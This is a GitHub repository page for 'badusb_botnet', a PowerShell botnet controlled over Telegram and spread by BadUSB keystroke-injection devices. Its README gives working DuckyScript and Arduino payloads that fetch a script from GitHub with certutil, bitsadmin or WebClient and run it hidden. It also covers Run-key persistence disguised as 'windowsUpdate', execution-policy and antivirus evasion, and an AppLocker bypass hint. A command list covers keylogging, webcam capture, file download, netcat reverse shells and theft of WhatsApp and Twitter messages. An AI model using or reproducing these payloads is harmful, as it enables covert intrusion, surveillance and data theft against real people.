• Stars
    star
    160
  • Rank 234,703 (Top 5 %)
  • Language
    PowerShell
  • Created over 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

πŸ‘₯😈 Infect a pc with badusb and establish a connection through telegram.

badusb_botnet

😈πŸ‘₯ Infect a pc with badusb and establish a connection through telegram.

Configuration

############
## CONFIG ##
############

$BotToken = "<BOTTOKEN>"
$ChatID = '<CHATID>'
$githubScript = '<you_fork/poc.ps1>'

To create a telegram bot: https://core.telegram.org/bots#6-botfather

To get ChatID: https://stackoverflow.com/questions/32423837/telegram-bot-how-to-get-a-group-chat-id

Option 1: Powershell

Option 1.1: Simple

> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
> (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
> powershell.exe -windowstyle hidden -file poc.ps1
DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
DELAY 500
ENTER
STRING (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
DELAY 500
ENTER
STRING powershell.exe -windowstyle hidden -file poc.ps1
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 1.2: Backdoor

> reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
> Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
DELAY 500
ENTER
STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
DELAY 500
ENTER
STRING reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 2: CMD

Windows Powershell is too slow at startup, so we can use cmd to download the '.ps1' file and execute it. To download a file with cmd, we can use two options: bitsadmin or certutil.exe. (Certutil is not installed by default on XP/Win2003 but is avaialble on the newer windows versions. For XP/2003 you'll need the Admin Tool Pack for windows server 2003).

Syntax

> bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
> certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Option 2.1: Simple

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> powershell.exe -windowstyle hidden -file "Documents/windowsUpdate.ps1"

or

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell.exe -windowstyle hidden -executionPolicy bypass -file "Documents/windowsUpdate.ps1"

Avast detects this last option.

Option 2.2: Backdoor

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" Documents\windowsUpdate.ps1
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
> reboot (?)

Example with digispark

#define kbd_es_es
#include "DigiKeyboard.h"
void setup() {
}

void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell -noe -c \". mode.com con: lines=1 cols=40\"");
//DigiKeyboard.print("cmd");
//DigiKeyboard.print("cmd /k mode con:cols=20 lines=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(3000);
DigiKeyboard.print("Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print("S");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("(new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell.exe -windowstyle hidden -file poc.ps1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/*empty*/
    }
}

Keyboard en_US to es_ES: https://github.com/ernesto-xload/DigisparkKeyboard Decompress the archive and put all in : C:\Users\Administrador\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard, later in the script you must put the following line to specify the keyboard layout.

#define kbd_es_es

Example with ATMega32u4

First, we need put the keyboard.h library in es_ES, to do this you can copy the Keyboard directory of this project into: "C:\Program Files (x86)\Arduino\libraries".

#include <Keyboard.h>

void setup() {
  Keyboard.begin(); //Start keyboard communication
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(500);

  Keyboard.println("cmd");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();

  Keyboard.println("certutil.exe -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell.exe -windowstyle hidden -file \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}
void loop() {
}

We use the \" to scape the double quotes in Arduino code.

Example with bitsadmin

Keyboard.println(" bitsadmin /transfer \"Descargando Drivers USB\" /download /priority high \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" %TEMP%/poc.ps1 && echo Instalando Drivers: ");

Evade AVs

Obfuscating Binary Names

For Loop Value Extraction

FOR /F β€œdelims=s\ tokens=4” %a IN (β€˜set^|findstr PSM’)DO %a

Example:

Keyboard.println(" FOR /F \"delims=/ tokens=1\" %a IN ('where certutil')DO %a -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\" ");

Bypass AppLocker

Policies of AppLocker are stored in HKEY_LOCAL_Machine\Software\Policies\Microsoft\Windows\SrpV2, You can verify the folders in which you have permission to run .ps1 scripts.

Telegram Options

Basic

  • /list (List all devices availables)
  • /select IP command (Execute a command)
  • /stop IP (Stop remote connection)
  • /cleanAll IP (Clean all files)
  • /ipPublic IP (Geolocate IP)
  • /download IP file (Download a file from PC)

Advanced

  • /screenshot IP (Capture screen)
  • /backdoor IP (Create a persistent backdoor)
  • /webcam IP
  • /keylogger IP time in seconds
  • /nc IP IP to connect ($ip) (First you must use nc -lp 8888 -v to create a listener)
  • /stopnc IP (Stop nc.exe and erase all archives)

Ultra :squirrel:

  • /hackT IP (Get Twitter messages if the victim is authenticated) [Only web - W10]
  • /hackW IP (Get WhatsApp messages if the victim is authenticated) [Only Web - W10]
  • /starttwitch IP STREAM_KEY (Start a video transmission on Twitch with ffmpeg)
  • /stoptwitch IP (Stop ffmpeg.exe and erase all archives)

PoCs

πŸ”—πŸ“Ί TOUR - POC

πŸ”—πŸ“Ί TWITCH STREAMING - POC

πŸ”—πŸ“Ί KEYLOGGER - POC

πŸ”—πŸ“Ί DIGISPARK - POC

{TODO}
  • Change all Invoke-WebRequest to cURL. (Invoke-WebRequest requires set up Internet Explorer)
  • Create an ID for each connected user.
  • Hack WhatsApp on .exe.
  • βœ”οΈ Fix Twitch streaming.
  • βœ”οΈ Fix keylogger.
  • Add monitor selector to screenshot.
  • Add windows version detector in HackTwitterW10() and hackWhatsAPPW10() functions.
  • Add hackGmail().
  • βœ”οΈ Verbose via telegram messages.
  • βœ”οΈ Netcat reverse connection.

More Repositories

1

A-Detector

⭐ An anomaly-based intrusion detection system.
Python
80
star
2

offensive-vlang

POCs to test Vlang in cybersecurity aspects.
V
33
star
3

CVE-Search

CVE-Search (name still in alpha), is a Machine Learning tool focused on the detection of exploits or proofs of concept in social networks such as Twitter, Github. It is also capable of doing related searches on Google, Yandex, DuckDuckGo on CVEs and detecting if the content may be a functional exploit, a proof of concept or simply information about the vulnerability.
Jupyter Notebook
25
star
4

iSOC

πŸ“Š Deploy an "illegal" SOC to manage vulnerabilities on your city servers in minutes.
Jupyter Notebook
19
star
5

happy_iqy

πŸ“§πŸ˜ˆ Example of spread phishing with '.iqy' files with ruby on rails server.
Ruby
6
star
6

gomitm

🚧 An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers written in go.
Go
5
star
7

CVE-2020-7200

CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC
Java
5
star
8

C-SAST

An automated web application source code vulnerability detection application with machine learning.
PHP
4
star
9

CMS_version_detector_PoC

A Machine Learning application that detects versions of WordPress with Multi-Class classification algorithms.
Jupyter Notebook
3
star
10

yaxss

Yet another XSS fuzzer.
Python
3
star
11

docker-responder

Docker-based platform for conducting MultiRelay attacks using Responder.
Dockerfile
3
star
12

Exploits

Ruby
2
star
13

nfts_research

Jupyter Notebook
1
star
14

flask_deploy

⚑️ Flask fast deploy, yes, It includes Bootstrap 4.
Shell
1
star
15

poc

jeje
PowerShell
1
star
16

captura

CSS
1
star
17

TeleLoggerv2

Python
1
star
18

instastalker

πŸ“±πŸ“· An web panel to stalker people of instagram written in ruby on rails.
Ruby
1
star
19

TeleLogger

Python
1
star
20

VoluntariadoPCB

A PCB to easily teach kids how to make a robot that can detect obstacles.
1
star
21

botApacheAdmin

Python
1
star
22

AAA

Jupyter Notebook
1
star
23

instastalker2

πŸ“±πŸ“· An web panel to stalker people of instagram written in ruby on rails.
1
star
24

mini-Cactus

🌡 mini-Cactus discovery, at the moment it's just a PoC.
C++
1
star
25

HACKtheCITY

πŸŒ† Hack the city with one click. *Include script kiddie protection
HTML
1
star
26

PAScanner

⚠️ **OUTDATED** Scanner that analyzes WebApps coming from a zip code.
Python
1
star